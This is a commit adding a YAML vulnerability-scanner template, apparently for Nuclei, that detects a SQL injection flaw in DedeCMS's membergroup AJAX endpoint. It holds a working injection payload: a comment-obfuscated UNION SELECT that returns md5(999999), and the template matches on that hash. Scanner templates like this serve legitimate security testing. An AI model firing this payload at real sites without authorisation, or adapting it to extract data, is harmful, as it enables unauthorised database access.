Create dedecms-membergroup-sqli.yaml

patch-1
PikPikcU 2021-03-15 08:01:47 +00:00 committed by GitHub
parent b09026a396
commit 332ccbdb36
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: dedecms-membergroup-sqli
info:
name: DedeCMS Membergroup SQLI
author: pikpikcu
severity: medium
reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
matchers-condition: and
matchers:
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2"
part: body
condition: and
- type: status
status:
- 200